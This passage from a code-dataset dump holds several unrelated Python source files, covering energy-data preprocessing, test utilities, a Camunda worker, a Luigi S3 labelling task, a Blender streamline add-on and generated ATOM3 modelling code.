self.__score = value","sub_path":"month_01/teacher/day14/commodity_info_manager/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"588285204","text":"\"\"\"Preprocess the data and insert in DB.\"\"\"\n\nimport pandas as pd\nimport sqlalchemy as sa\nimport pathlib as pathlib\n\n# Parameters\n\nPROJECT_DIR = pathlib.Path(__file__).parent.parent\nDB_FILE = PROJECT_DIR / \"data\" / \"db.sqlite\"\n\nDB_URI = f'sqlite:///{DB_FILE.absolute().as_posix()}'\nTABLE_NAME = 'CO2'\n\n\n## Places of the measurements as columns of the DataFrame\n## obtained from on onlinedata file as:\n## import codecs\n## with codecs.open(\"20181104_onlinedata.txt\", \"r\", \"latin1\") as f:\n## t = f.read()\n## t=t.splitlines()[20:0]\n## col = [s[3:] for s in t[:20]]\n\ncol = ['Centrale kraftværker DK1',\n 'Centrale kraftværker DK2',\n 'Decentrale kraftværker DK1',\n 'Decentrale kraftværker DK2',\n 'Vindmøller DK1',\n 'Vindmøller DK2',\n 'Udveksling Jylland-Norge',\n 'Udveksling Jylland-Sverige',\n 'Udveksling Jylland-Tyskland',\n 'Udveksling Sjælland-Sverige',\n 'Udveksling Sjælland-Tyskland',\n 'Udveksling Bornholm-Sverige',\n 'Udveksling Fyn-Sjaelland',\n 'Temperatur i Malling',\n 'Vindhastighed i Malling',\n 'CO2 udledning',\n 'Havmøller DK',\n 'Landmøller DK',\n 'Solceller DK1',\n 'Solceller DK2']\n\ndef preprocess_file(file_name):\n '''\n Preprocess accepts a file that should be formatted as *onlinedata.txt and returns a DataFrame of its content.\n '''\n\n # Create DataFrame from file\n df = pd.read_csv(file_name, sep=';', skiprows=21, skip_blank_lines=True)\n \n # Remove useless columns and prettify it\n \n ## Remove useless column\n df.drop(['Unnamed: 21'], axis=1, inplace=True)\n ## Remove whitespace from columns' name\n df.rename(str.strip, axis='columns', inplace=True)\n ## Rename datetime column\n df.rename(index=str, columns={df.columns[0]: \"Timestamp\"}, inplace=True)\n ## Cast Timestamp column to datetime type and format for improved functionalties\n df[df.columns[0]] = pd.to_datetime(df[df.columns[0]])\n ## Set Timestamp column as index (useless?)\n df.set_index(df.columns[0], inplace=True)\n\n df.columns = col\n\n return df\n\ndef add_to_db(df, db_uri, table_name):\n '''\n Add DataFrame (returned by preprocess) to the database\n '''\n\n en = sa.create_engine(db_uri)\n\n df.to_sql(table_name, en, if_exists='append')\n","sub_path":"utils/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"602315017","text":"\n\nfrom xai.brain.wordbase.nouns._endeavour import _ENDEAVOUR\n\n#calss header\nclass _ENDEAVOURS(_ENDEAVOUR, ):\n\tdef __init__(self,): \n\t\t_ENDEAVOUR.__init__(self)\n\t\tself.name = \"ENDEAVOURS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"endeavour\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_endeavours.py","file_name":"_endeavours.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"536381793","text":"#!/usr/bin/env python\n#\n# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport shutil\nimport unittest\n\nfrom dwarf import db\n\n\nclass TestCase(unittest.TestCase):\n def setUp(self):\n super(TestCase, self).setUp()\n if os.path.exists('/tmp/dwarf'):\n shutil.rmtree('/tmp/dwarf')\n os.makedirs('/tmp/dwarf/images')\n os.makedirs('/tmp/dwarf/instances/_base')\n\n def tearDown(self):\n super(TestCase, self).tearDown()\n if os.path.exists('/tmp/dwarf'):\n shutil.rmtree('/tmp/dwarf')\n\n\ndef db_init():\n dwarf_db = db.Controller()\n dwarf_db.delete()\n dwarf_db.init()\n return dwarf_db\n\n\ndef to_headers(metadata):\n headers = []\n for (key, val) in metadata.iteritems():\n if key == 'properties':\n for (k, v) in val.iteritems():\n headers.append(('x-image-meta-property-%s' % k, str(v)))\n else:\n headers.append(('x-image-meta-%s' % key, str(val)))\n return headers\n","sub_path":"tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"573342984","text":"from mcpele1.montecarlo.template import *\nfrom mcpele1.conftest import check_spherical_container\n\nclass ConfTestOR(ConfTest):\n m_tests: list = None\n\n #check the variables for this method\n @abc.abstractclassmethod\n def add_test(self, test_input):\n self.m_tests.append(test_input)\n\n @abc.abstractclassmethod\n def conf_test(self, trial_coords):\n if (len(self.m_tests) == 0 ):\n print(\"no conf test specified\")\n i=0\n while(i < len(self.m_tests)) :\n result: bool = check_spherical_container.conf_test(trial_coords)\n if(result):\n return True\n return False\n","sub_path":"mcpele1/conftest/conf_test_OR.py","file_name":"conf_test_OR.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"174003775","text":"import itertools as itert\ndef insert_operators(s, ans):\n\toperators = list(itert.product(['+','-',''], repeat=(len(s) - 1)))\n\n\tfor x in operators:\n\t\tList = list((str(a),b) for a,b in itert.zip_longest(s, list(x), fillvalue=''))\n\t\tresult = ''.join([''.join(i) for i in List])\n\t\tif(eval(result) == ans):\n\t\t\tres = result + '=' + str(ans)\n\t\t\treturn res\n\n\treturn None","sub_path":"önn3/Python/InsertOP.py","file_name":"InsertOP.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"446743820","text":"# File picker for pythonista\n# coding by zencha201\n\nimport ui\nimport os\n\nclass FilePicker(ui.View):\n def __init__(self, name='file picker', path=os.environ['HOME'] + '/Documents/', action=None):\n self.path=path\n tv=ui.TableView()\n tv.frame=self.bounds\n tv.flex='WH'\n ds=ui.ListDataSource({})\n ds.action=self.item_selected\n tv.data_source=ds\n tv.delegate=ds\n self.table_view=tv\n self.add_subview(self.table_view)\n \n self.name=name\n self.path=path\n self.action=action\n self.selected_path=''\n self.update(self.path)\n\n def get_selected_path(self):\n return self.selected_path\n \n def item_selected(self, sender):\n item=sender.items[sender.selected_row]\n if item['is_dir']:\n self.update(item['full_path'])\n else:\n self.selected_path=item['full_path']\n if self.action!=None:\n self.action(self)\n \n def update(self, path):\n items=[]\n \n item={'title':'..', 'image':'ionicons-arrow-up-b-32', 'is_dir':True , 'full_path':os.path.abspath(path+'../')+'/'}\n items.append(item)\n \n files=os.listdir(path)\n for file in files:\n full_path=path+file\n \n is_dir=os.path.isdir(full_path)\n image='ionicons-document-32'\n \n if is_dir:\n full_path=full_path+'/'\n image='ionicons-ios7-folder-32'\n \n item={'title':file, 'image':image, 'is_dir':is_dir, 'full_path':full_path}\n items.append(item)\n\n self.table_view.data_source.items=items\n self.path=path\n\n\n","sub_path":"filepicker.py","file_name":"filepicker.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"380685487","text":"import json\n\nfrom camunda.external_task.external_task import ExternalTask, TaskResult\nfrom sqlalchemy.orm.session import sessionmaker\nfrom camundaworkers.logger import get_logger\nfrom camundaworkers.model.base import create_sql_engine\nfrom camundaworkers.model.flight import OfferMatch\nfrom camundaworkers.model.offer_purchase_data import OfferPurchaseData\n\n\ndef rehabilitation_offer_code(task: ExternalTask) -> TaskResult:\n \"\"\"\n Compensation task: if the verification offer code and payment sub process fail, this task rehabilitates the offer\n code for another try.\n :param task: the current task instance\n :return: the task result\n \"\"\"\n logger = get_logger()\n logger.info(\"rehabilitation_offer_code\")\n\n offer_purchase_data = OfferPurchaseData.from_dict(json.loads(task.get_variable(\"offer_purchase_data\")))\n\n offer_code = offer_purchase_data.offer_code\n\n # Connects to postgreSQL\n Session = sessionmaker(bind=create_sql_engine())\n session = Session()\n\n \"\"\"\n Gets the offer match that has to be rehabilitated from the DB.\n The offer match is the one blocked and with offer_code equal to the process offer_code variable.\n \"\"\"\n affected_rows = session.query(OfferMatch).filter(OfferMatch.offer_code == offer_code).update({\"blocked\": False},\n synchronize_session=\"fetch\")\n if affected_rows < 1:\n session.rollback()\n logger.error(\n f\"{affected_rows} matches were found for the given offer code. The offer code will not be rehabilitated.\")\n return task.complete()\n\n logger.info(f\"{affected_rows} match was found for the given offer code.\")\n session.commit()\n return task.complete()\n","sub_path":"camundaworkers/workers/buy_offer/rehabilitation_offer_code.py","file_name":"rehabilitation_offer_code.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"242909487","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nswap_columns.py\n\nCreated by Vince Fernando on 2012-01-21.\n\"\"\"\n\n# CONSTANTS are in capital letters\nINPUT_FILE = '/Users/vincefernando/PYTHON/image.txt'\nOUTPUT_FILE = '/Users/vincefernando/PYTHON/image_modified.txt'\n\nimport csv \n\n# Open file safely\nwith open(INPUT_FILE, 'r') as f:\n # Read entire file \n # We go through the file and save to 'line' IF the line is\n # not empty. \n # Perhaps not safe for large files\n lines = [line for line in f.readlines() if line.strip()]\n\n# Initialise empty region list\nregions = []\n\n# Loop to find 'regions' (first field in line)\nfor line in lines:\n # Find first parameter in line and call it the region\n # Split the line on commas, and select 0 index in resulting\n # list. \n region = line.split(',')[0]\n # Check to see if the region exists, if not add to region list\n if region not in regions:\n regions.append(region)\n \n# Initialise the csv output writer and get the output_writer object\noutput_writer = csv.writer(open(OUTPUT_FILE, 'wb'), delimiter=',', quoting=csv.QUOTE_MINIMAL)\n\n\nfor line in lines:\n # Remove whitespace from line (especially '\\n')\n # Return a list (items) which is split upon finding commas\n items = line.strip().split(',')\n \n # Take the first item of items (the region)\n # Return the index of the region from the regions list\n # Turn the index into a string\n # Assign the index as the replacement of the region.\n items[0] = str(regions.index(items[0]))\n\n # Write the row to the file\n output_writer.writerow(items)\n\n\n# Lists\n# [, ]\n\n# Tuples\n# (, )\n\n# Dictionaries\n# { key: value, }\n\n\n \n\n\n","sub_path":"swap_columns.py","file_name":"swap_columns.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"76085637","text":"bl_info = {\n \"name\": \"Move X Axis\",\n \"category\": \"Object\",\n}\n\nPREFIX_U = 'u_r_'\nPREFIX_V = 'v_r_'\nPREFIX_RHO = 'rho_r_'\nPATH = '/home/behollis/DATA/in/ts00050/'\nDPATH = '/home/behollis/DATA/out/lockExSt/ts00050/'\n\nimport sys\n#H5PY_SOURCE_DIR = '/usr/local/lib/python2.7/dist-packages/h5py-2.3.1-py2.7-linux-x86_64.egg'\n#if H5PY_SOURCE_DIR not in sys.path:\n# sys.path.append(H5PY_SOURCE_DIR)\n\nPATH = '/home/behollis/Dropbox/eurovis2015shortpaperCode/src/'#os.path.dirname(__file__)\nif PATH not in sys.path:\n sys.path.append(PATH)\n \nimport loadStreamlines\nimport bpy\nimport h5py\n#import pydevd\n#import debugmaya\nfrom loadStreamlines import readStreamlines\nimport interpProbDensity\nfrom bpy_extras.io_utils import ImportHelper\nimport mathutils\n\n\nprob = None\nslines = None\nMEM = 10\n\n#\n# Store properties in the active scene\n#\ndef initSceneProperties(scn):\n bpy.types.Scene.seed_x = bpy.props.IntProperty(\n name = 'X', \n description = \"X seed location\")\n scn['seed_x'] = 30 \n \n bpy.types.Scene.seed_y = bpy.props.IntProperty(\n name = 'Y', \n description = \"Y seed location\")\n scn['seed_y'] = 25\n \n bpy.types.Scene.seed_z = bpy.props.IntProperty(\n name = 'Z', \n description = \"Z seed location\")\n scn['seed_z'] = 0\n \n bpy.types.Scene.members = bpy.props.IntProperty(\n name = 'Members', \n description = 'Number of members')\n scn['members'] = 10\n \n return\n \ninitSceneProperties(bpy.context.scene)\n\n#\n# Menu in UI region\n#\nclass Hdf5ImportPanel(bpy.types.Panel):\n bl_label = 'KDE Streamlines'\n bl_space_type = \"VIEW_3D\"\n bl_region_type = \"UI\"\n \n def draw(self, context):\n \n layout = self.layout\n \n #layout.label('')\n row = layout.row(align=True)\n row.alignment = 'EXPAND'\n row.operator('h5py.load', text='import', icon='FILE_FOLDER')\n \n scn = context.scene\n layout.prop(scn, 'seed_x')\n layout.prop(scn, 'seed_y')\n layout.prop(scn, 'seed_z')\n layout.prop(scn, 'members')\n \n row = layout.row(align=True)\n row.operator(\"object.loadsls\", text='load', icon='MESH_DATA')\n \n #row.operator(\"object.loadsls\", icon='LAMP_DATA')\n \nclass OBJECT_OT_LoadHdf5Button(bpy.types.Operator, ImportHelper):\n #http://wiki.blender.org/index.php/Dev:2.5/Py/Scripts/Cookbook/Code_snippets/Blender_add-ons\n \n bl_idname = \"h5py.load\"\n bl_label = \"Load hdf5 file\"\n \n # From ImportHelper. Filter filenames.\n filename_ext = \".hdf5\"\n filter_glob = bpy.props.StringProperty(default='*.hdf5', options={'HIDDEN'})\n \n filepath = bpy.props.StringProperty(name='File Path', maxlen=1024, default=DPATH)\n \n def execute(self, context):\n import os\n global prob, slines, MEM\n \n f = h5py.File(self.properties.filepath, 'r')\n \n seed_x = bpy.context.scene['seed_x']\n seed_y = bpy.context.scene['seed_y']\n seed_z = bpy.context.scene['seed_z']\n slines = readStreamlines(seed_x, seed_y, f)\n print('loaded {0} slines'.format(len(slines)))\n \n f.close()\n \n return{'FINISHED'} \n \n def invoke(self, context, event):\n context.window_manager.fileselect_add(self)\n return {'RUNNING_MODAL'} \n\n\nclass KDEStreamlines(bpy.types.Operator):\n ''' ''' # blender will use this as a tooltip for menu items and buttons.\n bl_idname = \"object.loadsls\" # unique identifier for buttons and menu items to reference.\n bl_label = 'Load KDE Streamlines' # display name in the interface.\n bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.\n\n def createNewStreamline(self, name):\n me = bpy.data.meshes.new(name)\n ob = bpy.data.objects.new(name, me) \n \n # Link the object to the current scene and make it active. \n # Optionally, we can make the newly created object active \n # or selected. This code is the same for all kinds of objects.\n scn = bpy.context.scene\n scn.objects.link(ob)\n scn.objects.active = ob \n \n return ob, me\n \n def findVerts(self, sl):\n verts = list() \n for ptidx in range(0, len(sl[0])):\n vert = ( sl[0][ptidx], sl[1][ptidx], 0.0 )\n verts.append( vert )\n \n return verts\n \n def findEdges(self, sl):\n edges = list()\n for idx in range(1,len(sl[0])):\n edge = ( idx - 1, idx )\n edges.append( edge )\n \n return edges\n \n def addProbMaterial(self, slprobs, slobs, prob_list):\n ''' Adds material to each face of streamline quads based\n on cumulative density of velocities in field. '''\n \n bpy.ops.object.mode_set(mode='OBJECT')\n \n for idx in range(0,len(slobs)):\n ma = bpy.data.materials.new('sl'+str(idx+1))\n ma.diffuse_color[0] = 0.0 #r\n ma.diffuse_color[1] = 1.0 #g\n ma.diffuse_color[2] = 0.0 #b\n #scale intensity by fraction of maxium value\n intensity = ( slprobs[idx+1][0] - min(prob_list) ) / ( max(prob_list) - min(prob_list) )\n ma.diffuse_intensity = intensity\n ma.emit = 2.0 * intensity\n \n print('material intensity = {0}'.format( intensity ))\n \n slobs[idx].data.materials.append(ma)\n \n \n \n def extrudeEdges(self, slmesh, ob):\n ''' Extrudes edges to produce faces on either side of orthogonal direction to \n streamline line segments. Note: Assumes streamlines are\n in the x-y plane with zero z component. '''\n \n bpy.ops.object.mode_set(mode='OBJECT')\n bpy.ops.object.editmode_toggle() \n ob.select = True\n \n verts = slmesh.vertices#ob.data.vertices\n nverts = len(verts)\n \n for idx in range(0, nverts-1):\n v0 = verts[idx].co\n v1 = verts[idx+1].co\n segdir = v1 - v0\n \n kvec = mathutils.Vector((0.0,0.0,1.0)) #k unit vector\n ortho = segdir.cross(kvec)\n ortho.normalize()\n ortho *= 0.1 #scale dir of extrusionn\n \n # each segment produces two faces, \n # extruded in oppposite directions\n #bpy.ops.object.mode_set(mode='OBJECT')\n \n # deselect all geometry\n #http://www.blender.org/api/blender_python_api_2_72b_release/bpy.ops.mesh.html\n #bpy.ops.object.mode_set(mode='OBJECT')\n #bpy.ops.object.select_all(action='DESELECT') \n \n bpy.ops.object.mode_set(mode='EDIT')\n bpy.ops.mesh.select_all(action='DESELECT') \n \n bpy.ops.object.mode_set(mode='OBJECT')\n ob.data.edges[idx].select = True\n bpy.ops.object.mode_set(mode='EDIT')\n \n # first face\n bpy.ops.mesh.extrude_edges_indiv(mirror=True) #not sure what mirror parameter does??\n #bpy.ops.mesh.extrude_edges_move() #not sure what mirror parameter does??\n bpy.ops.transform.translate(value=(ortho[0], ortho[1], ortho[2]), mirror = True)\n \n # second face\n #bpy.ops.mesh.extrude_edges_indiv(mirror=False) #not sure what mirror parameter does??\n #bpy.ops.transform.translate(ortho.negate())\n ob.data.edges[idx].select = False\n \n slmesh.update()\n \n \n def execute(self, context): # execute() is called by blender when running the operator.\n \n global prob, slines, MEM\n \n MEM = bpy.context.scene['members'] \n \n seed_x = bpy.context.scene['seed_x']\n seed_y = bpy.context.scene['seed_y']\n seed_z = bpy.context.scene['seed_z']\n \n slines_prob, prob_list = interpProbDensity.calcStreamlineProbs([seed_x, seed_y], slines, MEM+10)\n \n slines_obs = list()\n \n idx = 1\n for sl in slines[1:MEM]:\n ob, me = self.createNewStreamline('sl'+str(idx).zfill(3))\n idx += 1\n verts = self.findVerts(sl) \n edges = self.findEdges(sl) \n \n me.from_pydata( verts, edges, [] )\n me.update()\n bpy.context.scene.update() #make sure the mesh / object is in scene before changing modes\n \n print( 'Extruding streamline {0}'.format( str(idx) ) )\n self.extrudeEdges(me,ob)\n \n slines_obs.append(ob)\n \n self.addProbMaterial(slines_prob, slines_obs, prob_list[1:MEM])\n \n return {'FINISHED'} # this lets blender know the operator finished successfully.\n\ndef register(): \n #bpy.utils.register_class(LoadKDEStreamlines)\n bpy.utils.register_module(__name__)\n\n\ndef unregister():\n #bpy.utils.unregister_class(LoadKDEStreamlines)\n bpy.utils.unregister_module(__name__)\n\n\n# This allows you to run the script directly from blenders text editor\n# to test the addon without having to install it.\nif __name__ == \"__main__\":\n register()\n","sub_path":"src/kdeStreamlineMetricBlender.py","file_name":"kdeStreamlineMetricBlender.py","file_ext":"py","file_size_in_byte":9214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551109847","text":"# ----------------------------------------- #\n# Date: 2019-05-15 11:47:05\n# Author: Ron K.Y\n# LastEditors: Ron K.Y\n# LastEditTime: 2019-07-02 17:12:43\n# Description:\n# Runtime: ms\n# ----------------------------------------- #\nimport helper_functions\nimport csv\nimport time\n\nif __name__ == \"__main__\":\n\n color_threshold = helper_functions.IMAGE_ANALYSIS_PARAM.param[\"color_threshold\"]\n label_threshold = helper_functions.IMAGE_ANALYSIS_PARAM.param[\"label_threshold\"]\n image_adjusted_size = helper_functions.IMAGE_ANALYSIS_PARAM.param[\"image_adjusted_size\"]\n main_color_num = helper_functions.IMAGE_ANALYSIS_PARAM.param[\"main_color_num\"]\n\n img_list = helper_functions.list_folder_file_to_path(\"C:\\\\projects\\\\img\\\\input\\\\color_label_test0702\")\n output_path = \"C:\\\\projects\\\\img\\\\output\\\\10\"\n csv_path = \"C:\\\\projects\\\\img\\\\output\\\\10\\\\analysis.csv\"\n model_file = \"C:\\\\projects\\\\product_binarization\\\\models\\\\v4_rf.m\"\n k = 0\n t1 = time.time()\n for n in img_list:\n\n img = helper_functions.resize_img(n, image_adjusted_size)\n\n array = helper_functions.image_binarization(img, color_threshold)\n\n main_color_per_rgb = helper_functions.img_kmean(array, main_color_num)\n\n color_label = helper_functions.convert_rgb2label(main_color_per_rgb, label_threshold, model_file)\n # helper_functions.generate_main_color_bar(main_color_per_rgb, output_path, n)\n # Output Analysis Result to CSV file\n with open(csv_path, \"a\", newline=\"\") as csv1:\n csv_write = csv.writer(csv1, dialect='excel')\n writing_list = [n]\n for color_info in main_color_per_rgb:\n writing_list.append(color_info[0])\n writing_list.append(color_info[1])\n i = 0\n for m, v in color_label.items():\n writing_list.append(m)\n writing_list.append(v)\n i += 1\n while i < main_color_num:\n writing_list.append(\"\")\n writing_list.append(\"\")\n i += 1\n csv_write.writerow(writing_list)\n k += 1\n print(k, writing_list)\n if k >= 1000:\n t2 = time.time()\n print(\"100 image done.\")\n print(\"Average Processing Time: \" + str(int(1000*(t2-t1)/k)) + \"ms\")\n input()\n \n # output_json = helper_functions.generate_output_json(color_label, main_color_per_rgb)\n","sub_path":"maincolor_test.py","file_name":"maincolor_test.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"111319352","text":"#!/usr/bin/python\nimport sys\nimport re\n\n\ndef main(enc):\n if enc is None:\n enc = 'utf-8'\n pattern = re.compile('((\\d+)|([a-zA-Z]+))')\n for line in sys.stdin:\n line = line.strip().decode(enc)\n output = pattern.sub(r'####\\1####', line).strip().encode(enc)\n output = ''.join(output.split()).replace('####', ' ').strip()\n sys.stdout.write('%s\\n' % output)\n\n\nif __name__ == '__main__':\n main(None)\n\n","sub_path":"scripts/ai-parse-zh-alphanum.py","file_name":"ai-parse-zh-alphanum.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"355548557","text":"import luigi\nimport luigi.contrib.s3\nimport boto3\nfrom cleaned_ingest_metadata import cleaned_task_metadata\nfrom io import StringIO\nimport pandas as pd\nimport numpy as np\nfrom math import floor\n\nclass label_task(luigi.Task):\n\tbucket = 'dpa-metro-label'\n\tyear = luigi.IntParameter()\n\tmonth = luigi.IntParameter()\n\tstation = luigi.Parameter()\n\n\tdef requires(self):\n\t\treturn cleaned_task_metadata(self.year,self.month,self.station)\n\n\tdef run(self):\n\t\tline = \"line\"\n\t\tstation = \"station\"\n\t\tyear = \"year\"\n\t\tmonth = \"month\"\n\t\tinflux = \"influx\"\n\t\tq3 = \"percentile_0.75\"\n\t\tq1 = \"percentile_0.25\"\n\t\tiqr = \"iqr\"\n\t\tmin_range = \"min_range\"\n\t\tmax_range = \"max_range\"\n\t\tprom = \"mean\"\n\t\tdate = \"date\"\n\n\t\tses = boto3.session.Session(profile_name='omar', region_name='us-east-1')\n\t\ts3_resource = ses.resource('s3')\n\n\t\tobj = s3_resource.Object(\"dpa-metro-cleaned\",\"year={}/month={}/station={}/{}.csv\".format(str(self.year),str(self.month).zfill(2),self.station,self.station.replace(' ', '')))\n\t\tprint(ses)\n\n\t\tfile_content = obj.get()['Body'].read().decode('utf-8')\n\t\tdf = pd.read_csv(StringIO(file_content))\n\n\t\tdf[year] = self.year\n\t\tdf[month] = self.month\n\t\tdf[station] = self.station\n\n\t\tn = floor(df.shape[0] * .7)\n\t\tdf = df.sort_values(by = date, axis = 0)\n\t\tdf = df[0:n]\n\n\t\tdef percentile(n):\n\t\t\tdef percentile_(x):\n\t\t\t\treturn np.percentile(x, n)\n\t\t\tpercentile_.__name__ = 'percentile_%s' % n\n\t\t\treturn percentile_\n\n\t\tdef get_statistics(df):\n\t\t\treturn df.groupby([line, station]).agg([percentile(.25), percentile(.75), 'mean'])[influx].reset_index()\n\n\t\tdef calculate_range(df):\n\t\t\tstats = get_statistics(df)\n\t\t\tstats[iqr] = stats[q3] - stats[q1] \n\t\t\tstats[min_range] = stats[prom] - 1.5 * stats[iqr]\n\t\t\tstats[max_range] = stats[prom] + 1.5 * stats[iqr]\n\t\t\tstats = stats[[line, station, min_range, max_range]]\n\t\t\treturn stats\n\n\t\tdef join_range(df, stats):\n\t\t\treturn df.merge(stats, on = [line, station], how = 'left')\n\n\t\tdef create_label(df): \n\t\t\tdf[\"label\"] = np.where(df[influx] <= df[min_range], 1, np.where(df[influx] <= df[max_range], 2, 3))\n\t\t\treturn df\n\n\t\tfinal = create_label(join_range(df, calculate_range(df)))\n\n\t\twith self.output().open('w') as output_file:\n\t\t\tfinal.to_csv(output_file)\n\n\tdef output(self):\n\t\toutput_path = \"s3://{}/year={}/month={}/station={}/{}.csv\".\\\n\t\tformat(self.bucket,str(self.year),str(self.month).zfill(2),self.station,self.station.replace(' ', ''))\n\t\treturn luigi.contrib.s3.S3Target(path=output_path)\n\nif __name__ == \"__main__\":\n\tluigi.run()\n\n","sub_path":"scripts/label_creation.py","file_name":"label_creation.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"463000528","text":"from graph_ASG_ERmetaMetaModel import *\r\nfrom stickylink import *\r\nfrom widthXfillXdecoration import *\r\nfrom ASG_Buttons import *\r\nfrom ButtonConfig import *\r\nfrom graph_ButtonConfig import *\r\nfrom ATOM3Enum import *\r\nfrom ATOM3String import *\r\nfrom ATOM3BottomType import *\r\nfrom ATOM3Constraint import *\r\nfrom ATOM3Attribute import *\r\nfrom ATOM3Float import *\r\nfrom ATOM3List import *\r\nfrom ATOM3Link import *\r\nfrom ATOM3Connection import *\r\nfrom ATOM3Boolean import *\r\nfrom ATOM3Appearance import *\r\nfrom ATOM3Text import *\r\nfrom ATOM3Integer import *\r\nfrom ATOM3Port import *\r\nfrom ATOM3MSEnum import *\r\n\r\ndef EntityRelationship_META(self, rootNode):\r\n rootNode.RowSize.setValue(1)\r\n rootNode.Formalism_File.setValue('ERModels/ERmetaMetaModel_MM.py')\r\n rootNode.Formalism_Name.setValue('Entity Relationship')\r\n\r\n self.globalPrecondition( rootNode )\r\n\r\n self.obj25=ButtonConfig(self)\r\n\r\n self.obj25.Action.setValue(('ActionButton1', (['Python', 'OCL'], 1), (['PREcondition', 'POSTcondition'], 1), (['EDIT', 'SAVE', 'CREATE', 'CONNECT', 'DELETE', 'DISCONNECT', 'TRANSFORM', 'SELECT', 'DRAG', 'DROP', 'MOVE'], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]), '# This method has as parameters:\\n# - wherex : X Position in window coordinates where the user clicked.\\n# - wherey : Y Position in window coordinates where the user clicked.\\nnewPlace = self.createNewERentity (self, wherex, wherey)\\n'))\r\n self.obj25.Drawing_Mode.setValue((' ', 1))\r\n self.obj25.Drawing_Mode.config = 0\r\n self.obj25.Contents.Text.setValue('Entity')\r\n self.obj25.Contents.Image.setValue('ERModels/Entity.gif')\r\n self.obj25.Contents.lastSelected= \"Image\"\r\n self.obj25.graphClass_= graph_ButtonConfig\r\n if self.genGraphics:\r\n new_obj = graph_ButtonConfig(20.0,20.0,self.obj25)\r\n new_obj.DrawObject(self.UMLmodel)\r\n self.UMLmodel.addtag_withtag(\"ButtonConfig\", new_obj.tag)\r\n new_obj.layConstraints = dict() # Graphical Layout Constraints \r\n new_obj.layConstraints['scale'] = [1.8800000000000006, 0.7799999999999998]\r\n else: new_obj = None\r\n self.obj25.graphObject_ = new_obj\r\n rootNode.addNode(self.obj25)\r\n self.globalAndLocalPostcondition(self.obj25, rootNode)\r\n\r\n self.globalPrecondition( rootNode )\r\n\r\n self.obj26=ButtonConfig(self)\r\n\r\n self.obj26.Action.setValue(('ActionButton1', (['Python', 'OCL'], 1), (['PREcondition', 'POSTcondition'], 1), (['EDIT', 'SAVE', 'CREATE', 'CONNECT', 'DELETE', 'DISCONNECT', 'TRANSFORM', 'SELECT', 'DRAG', 'DROP', 'MOVE'], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]), '# This method has as parameters:\\n# - wherex : X Position in window coordinates where the user clicked.\\n# - wherey : Y Position in window coordinates where the user clicked.\\nnewPlace = self.createNewERrelationship (self, wherex, wherey)\\n\\n'))\r\n self.obj26.Drawing_Mode.setValue((' ', 1))\r\n self.obj26.Drawing_Mode.config = 0\r\n self.obj26.Contents.Text.setValue('Relationship')\r\n self.obj26.Contents.Image.setValue('ERModels/Relationship.gif')\r\n self.obj26.Contents.lastSelected= \"Image\"\r\n self.obj26.graphClass_= graph_ButtonConfig\r\n if self.genGraphics:\r\n new_obj = graph_ButtonConfig(20.0,80.0,self.obj26)\r\n new_obj.DrawObject(self.UMLmodel)\r\n self.UMLmodel.addtag_withtag(\"ButtonConfig\", new_obj.tag)\r\n new_obj.layConstraints = dict() # Graphical Layout Constraints \r\n new_obj.layConstraints['scale'] = [1.8800000000000006, 0.7799999999999998]\r\n else: new_obj = None\r\n self.obj26.graphObject_ = new_obj\r\n rootNode.addNode(self.obj26)\r\n self.globalAndLocalPostcondition(self.obj26, rootNode)\r\n\r\n self.globalPrecondition( rootNode )\r\n\r\n self.obj27=ButtonConfig(self)\r\n\r\n self.obj27.Action.setValue(('Action', (['Python', 'OCL'], 1), (['PREcondition', 'POSTcondition'], 1), (['EDIT', 'SAVE', 'CREATE', 'CONNECT', 'DELETE', 'DISCONNECT', 'TRANSFORM', 'SELECT', 'DRAG', 'DROP', 'MOVE'], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]), '# The parameters of this method are:\\n# - wherex\\n# - wherey\\n\\nself.genCode()\\n\\n\\n\\n\\n'))\r\n 